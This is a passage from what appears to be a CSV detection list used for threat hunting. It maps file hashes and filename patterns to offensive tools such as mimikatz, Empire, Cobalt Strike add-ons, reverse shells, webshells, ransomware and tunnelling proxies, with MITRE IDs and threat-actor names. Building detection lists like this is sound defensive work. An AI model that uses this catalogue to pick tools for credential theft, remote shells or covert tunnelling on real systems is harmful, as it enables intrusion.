- BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37728"
"*cc23f1713dd1642bd70e2c51f4907429bbcc6ef0f08fbf8c5593af46e003b59f*",".{0,1000}cc23f1713dd1642bd70e2c51f4907429bbcc6ef0f08fbf8c5593af46e003b59f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37729"
"*cc24850f03dccbd8ee3a372b06b2a77a95e5314bb68d2483b1814935978b7003*",".{0,1000}cc24850f03dccbd8ee3a372b06b2a77a95e5314bb68d2483b1814935978b7003.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#filehash","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","37730"
"*cc2db2e4464dfa466d3e4db6ad9c1c4905c26b513230f319e68e94133bd639df*",".{0,1000}cc2db2e4464dfa466d3e4db6ad9c1c4905c26b513230f319e68e94133bd639df.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","37733"
"*cc2FilesColor.*",".{0,1000}cc2FilesColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37734"
"*cc2ProcessColor.*",".{0,1000}cc2ProcessColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37735"
"*cc30035b9a609304bf7b3541906aa49379b71df79c92b58ff5f957c4fd40a20e*",".{0,1000}cc30035b9a609304bf7b3541906aa49379b71df79c92b58ff5f957c4fd40a20e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37736"
"*cc353aaa4dfe442dbee666feab014fb3804ed943711d41bef4c4ab13d2625a46*",".{0,1000}cc353aaa4dfe442dbee666feab014fb3804ed943711d41bef4c4ab13d2625a46.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37738"
"*cc3f112ed5af9b0b4de3ab165c1a08b0d3d24323f8492f0513a0af9e06e95eff*",".{0,1000}cc3f112ed5af9b0b4de3ab165c1a08b0d3d24323f8492f0513a0af9e06e95eff.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37740"
"*cc49a6056b1f2216c0986cd16b01d2fb5bc03664a2818a5ce3ecdc6a3132707c*",".{0,1000}cc49a6056b1f2216c0986cd16b01d2fb5bc03664a2818a5ce3ecdc6a3132707c.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#filehash","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","37743"
"*cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7*",".{0,1000}cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37744"
"*cc53120b476000a0d75242ec02ea715ecf9a48386ccafb31e60d481ef267e707*",".{0,1000}cc53120b476000a0d75242ec02ea715ecf9a48386ccafb31e60d481ef267e707.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37745"
"*cc541572d615cace2e8ea366aa1a91568559bd5f248405faba88a0d92a6e3211*",".{0,1000}cc541572d615cace2e8ea366aa1a91568559bd5f248405faba88a0d92a6e3211.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37747"
"*cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b*",".{0,1000}cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37749"
"*cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef*",".{0,1000}cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37750"
"*cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef*",".{0,1000}cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37751"
"*cc5b8ca570f2f1aa9aed761a466007e7bd4b807f823e5add1d10fb732a034e9c*",".{0,1000}cc5b8ca570f2f1aa9aed761a466007e7bd4b807f823e5add1d10fb732a034e9c.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","37752"
"*cc5f2e1b736d42c93cc10e7bab3004b24fe8c75ad565e1a65d3480b8bd1d1555*",".{0,1000}cc5f2e1b736d42c93cc10e7bab3004b24fe8c75ad565e1a65d3480b8bd1d1555.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","37753"
"*cc65a1b922258d72afbe7391a32a58cecfddb9ee4be41de53cd8a52b9b67b277*",".{0,1000}cc65a1b922258d72afbe7391a32a58cecfddb9ee4be41de53cd8a52b9b67b277.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37757"
"*cc715f31541c012d18607fa572cb5d802bfd4623a91d7ee0159e36ec3f2e5759*",".{0,1000}cc715f31541c012d18607fa572cb5d802bfd4623a91d7ee0159e36ec3f2e5759.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37758"
"*cc72ad7e6e7983dac3a4407002be6b88afe56a73d887a58137963aa56216f110*",".{0,1000}cc72ad7e6e7983dac3a4407002be6b88afe56a73d887a58137963aa56216f110.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37759"
"*cc762d44919d522ac0820401f1cdbc983865a9132728587f1dd47182d093fc88*",".{0,1000}cc762d44919d522ac0820401f1cdbc983865a9132728587f1dd47182d093fc88.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37760"
"*cc7f5f00092e920726e25cf3c47cbf36727e87aba7b4204408b9a44b67816b08*",".{0,1000}cc7f5f00092e920726e25cf3c47cbf36727e87aba7b4204408b9a44b67816b08.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37761"
"*cc81272307a9b746b67a9e9a52fbe5bc1f70f75c869480b517e16f34e20b80f5*",".{0,1000}cc81272307a9b746b67a9e9a52fbe5bc1f70f75c869480b517e16f34e20b80f5.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37762"
"*cc81556dec6e809ac1b518fc24e1b035e1b82dd57aa7f78606332e1d40a2add6*",".{0,1000}cc81556dec6e809ac1b518fc24e1b035e1b82dd57aa7f78606332e1d40a2add6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37763"
"*cc83886b15c006d0b3650f3327bf0264df635e6d11a3dd46680c8314bc6bd4f5*",".{0,1000}cc83886b15c006d0b3650f3327bf0264df635e6d11a3dd46680c8314bc6bd4f5.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","37764"
"*CC848BD0-3B2D-4C1E-BFCF-75A9894A581D*",".{0,1000}CC848BD0\-3B2D\-4C1E\-BFCF\-75A9894A581D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37765"
"*cc8bb64ef855405aeb66e480e8e7a2a65f61d495718fed2825083916cedd5e4c*",".{0,1000}cc8bb64ef855405aeb66e480e8e7a2a65f61d495718fed2825083916cedd5e4c.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","37766"
"*cc8ca4e1e0d6613bd6f040f098f59ff05cea4b9ca74262ec7319ce9846e51a6e*",".{0,1000}cc8ca4e1e0d6613bd6f040f098f59ff05cea4b9ca74262ec7319ce9846e51a6e.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37767"
"*cc9bd06b6d3513a61aa3f3f0f4e05072eb0ba40b46a1584b128fb46ccac87643*",".{0,1000}cc9bd06b6d3513a61aa3f3f0f4e05072eb0ba40b46a1584b128fb46ccac87643.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37772"
"*cc9d7b88c9fe25358764727439bc55d5df36dc828b2b620b05c9b6129109588a*",".{0,1000}cc9d7b88c9fe25358764727439bc55d5df36dc828b2b620b05c9b6129109588a.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","37773"
"*cc9f09bbdb9277265fd71b7575b1fdda3bc2f946*",".{0,1000}cc9f09bbdb9277265fd71b7575b1fdda3bc2f946.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","37774"
"*cca7ff524237c189fb05d3b65ea0f53ee6663f2b6a7c25c28e620d1b0705c874*",".{0,1000}cca7ff524237c189fb05d3b65ea0f53ee6663f2b6a7c25c28e620d1b0705c874.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37775"
"*cca8ea4f924ecc36731feb68313fa716881065641c2dd1a9db45a687d1fe0999*",".{0,1000}cca8ea4f924ecc36731feb68313fa716881065641c2dd1a9db45a687d1fe0999.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37776"
"*cca940a0ba81f0ab849d294e3399485f6bf82961997b66c2e093062e72a4d31e*",".{0,1000}cca940a0ba81f0ab849d294e3399485f6bf82961997b66c2e093062e72a4d31e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37777"
"*cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963*",".{0,1000}cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37778"
"*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37779"
"*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37780"
"*ccadb82e7bf79fc75084693b04d8679aebfc06be44ff4ed70fddecb5680fbc37*",".{0,1000}ccadb82e7bf79fc75084693b04d8679aebfc06be44ff4ed70fddecb5680fbc37.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37781"
"*ccadc33019cb57a56a268d0d6be1a9e242dd0881dbddc06f376a06c7c5846ed0*",".{0,1000}ccadc33019cb57a56a268d0d6be1a9e242dd0881dbddc06f376a06c7c5846ed0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37782"
"*ccaf8dda0e6569f46a12db288dbfeff95b91fdfa7beac679624e141dc92b05b2*",".{0,1000}ccaf8dda0e6569f46a12db288dbfeff95b91fdfa7beac679624e141dc92b05b2.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","37783"
"*ccb0b3f1ac000921117e6695c3eb5892c70b7867a9efd00438295e3dcdbd2991*",".{0,1000}ccb0b3f1ac000921117e6695c3eb5892c70b7867a9efd00438295e3dcdbd2991.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37784"
"*ccb76b3f79b0450fa184f0397af54e3fcf485a796ed65100ad86aca81222582a*",".{0,1000}ccb76b3f79b0450fa184f0397af54e3fcf485a796ed65100ad86aca81222582a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37787"
